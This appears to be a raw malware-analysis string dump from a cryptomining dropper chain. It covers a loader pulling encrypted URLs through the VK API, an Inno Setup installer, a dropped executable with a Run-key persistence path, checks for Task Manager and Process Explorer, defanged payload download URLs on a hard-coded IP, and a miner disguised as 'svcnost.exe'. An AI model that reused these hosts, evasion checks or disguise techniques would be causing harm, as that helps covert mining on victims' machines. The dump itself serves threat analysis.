HTTP/1.0
GetHTTPFile failed with code
Passed args[
/method/wall.get.xml?count=1&owner_id=-
api.vk.com
/method/wall.get.xml
Downloaded. Decrypting with key
hXXp://
Data\Client\Strings_RUS_RU.package
{46F1375C-3A8C-42E1-9A27-0CE809AD35AC}
{48EBEBBF-B9F8-4520-A3CF-89A730721917}
X:\551b45c5a2e3ajn57690b0469d26f1a3
\mic.exe
encryption_key
C:\Users\kali\Documents\Visual Studio 2012\Projects\Mining_framework\Release\RaumLoader.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
RegSetKeyValueA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
GetCPInfo
GetProcessHeap
zcÁ
original_exe_lol
setup.exe
c:\%original file name%.exe
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian

setup.exe_2928:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
KWindows
UrlMon
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Wed(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

setup.tmp_2060:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.OA
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
EInvalidGraphicOperation
TPent%C
PasswordChar
OnKeyDown
OnKeyPressLkR
OnKeyUp
ssHorizontal
TCustomButton.TButtonStyle
msShiftSelect
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKeyh
THotKey
HotKey
InvalidKeys
vsReport
Uh3%F
TComboBoxExEnumerator
EXPORT
TPSExec
TPSRuntimeClassImporterP;U
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
AUTOHOTKEYS
RETHINKHOTKEYS
OnKeyPress
t.Htb
1.2.1
TPasswordEdit
TPasswordEditHWL
PasswordEdit*
Password
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
GetPassword
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Uh.QP
IMsgt
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
MSGBOXEX
SETPASSWORD
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
TKeyEvent
TKeyPressEvent
HelpKeyword
AutoHotkeys
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
TBv`yDv}.Bv
CEw.AEw
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
ole32.dll
comctl32.dll
winspool.drv
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
`.rdata
@.data
.pdata
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
KWindows
UrlMon
6MsgIDs
Msgs
pIPEdit
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s_%d
.Owner
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
USER32.DLL
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
msctls_hotkey32
Items.ItemData
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
Rstrtmgr.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.1.ee2 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.1.ee2 (u)
Original Setup EXE:
Windows NT
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.1.ee2 (u)
Portions Copyright (C) 2000-2012 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
hXXp://restools.hanzify.org/
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date is less than minimum of %s
System Error. Code: %d.
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
crSQLWait
%s (%s)
imm32.dll
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Out Of Stack Range Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d<MultiLine must be True when TabPosition is tpLeft or tpRight
Invalid item level assignment Invalid level (%d) for item "%s"
Invalid owner %s is already associated with %sE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
LError loading dock zone from the stream. Expecting version %d, but found %d.,Multiselect mode must be on for this feature
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count#No OnGetItem event handler assigned"PageControl must first be assigned#No context-sensitive help installed
No help found for %s
Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity.There is no default printer currently selected/Menu '%s' is already being used by another form
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s property out of range
Unsupported clipboard format
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and <= %d[Invalid UTF32 character value. Must be >= 0 and <= $10FFF, excluding surrogate pair rangesrHigh surrogate char without a following low surrogate char at index: %d. Check that the string is encoded properlyrLow surrogate char without a preceding high surrogate char at index: %d. Check that the string is encoded properly
''%s'' is not a valid date#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid time
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0

yfRl.exe_2924:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
>v.TBv
Bv.SCv2
Found passed UNQ key
RegOpenKeyExA
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Run
hXXp://82.146.54.187/
procexp.exe
Taskmgr.exe
WinDefender.exe
lel.arch
hXXp://82.146.54.187/CSD/64_8.mining
hXXp://82.146.54.187/CSD/32_2.mining
main_exe
CMD line:
URLs:
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileA
urlmon.dll
DeleteUrlCacheEntry
WININET.dll
GetCPInfo
GetProcessHeap
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4L4J4v4
<.=4=8=<=@=
combase.dll
kernel32.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
mscoree.dll
USER32.DLL
portuguese-brazilian

svcnost.exe_1048:

.text
p`.data
.rdata
[email protected]
.idata
Montgomery Multiplication for x86, CRYPTOGAMS by <[email protected]>
SHA1 block transform for x86, CRYPTOGAMS by <[email protected]>
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
DlSHA512 block transform for x86, CRYPTOGAMS by <[email protected]>
 \$$;\$<
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <[email protected]>
GF(2^m) Multiplication for x86, CRYPTOGAMS by <[email protected]>
|$$ \$,)
D$.tF
-0123456789
libgcc_s_dw2-1.dll
libgcj-13.dll
asio.misc
asio.misc error
%d primes generated
Last Primorial Prime = %u
First Sieving Prime = %u
Primorial Size = %d-bit
No Inverse for prime %u at position %u
CBigNum::operator% : BN_div failed
CBigNum::operator- : BN_sub failed
CBigNum:operator<< : BN_lshift failed
CBigNum::operator/ : BN_div failed
CBigNum::operator  : BN_add failed
CBigNum::operator= : BN_copy failed
CBigNum::operator = : BN_add failed
$tIasio.misc
C:\Deps\boost_1_55_0/boost/thread/win32/thread_primitives.hpp
C:\Deps\boost_1_55_0/boost/thread/win32/thread_heap_alloc.hpp
detail::win32::HeapFree(detail::win32::GetProcessHeap(),0,heap_memory)!=0
thread.entry_event
thread.exit_event
C:\Deps\boost_1_55_0/boost/asio/detail/hash_map.hpp
it != values_.end()
C:\Deps\boost_1_55_0/boost/thread/win32/basic_timed_mutex.hpp
ERROR: %s
C:\Deps\boost_1_55_0/boost/smart_ptr/shared_ptr.hpp
[MASTER] Logged in With Address: %s Bytes: %u
Too Few Arguments. The Required Arguments are 'IP PORT ADDRESS'
Format for Arguments is 'IP PORT ADDRESS THREADS TIMEOUT'
Coinshield Prime Pool Miner 1.0.0 - Created by Videlicet - Optimized by Supercomputing
Using Supplied Account Address %s
Initializing Miner %s:%s Threads = %i Timeout = %i
Connected to %s:%s...
[METERS] %f PPS | Height = %u | Balance: %f CSD | Payout: %f CSD | d:d:d
[MASTER] Asking For New Block for Thread %u
[MASTER] Share Found | Difficulty %f | Hash %s | Thread %.2i --> [Accepted]
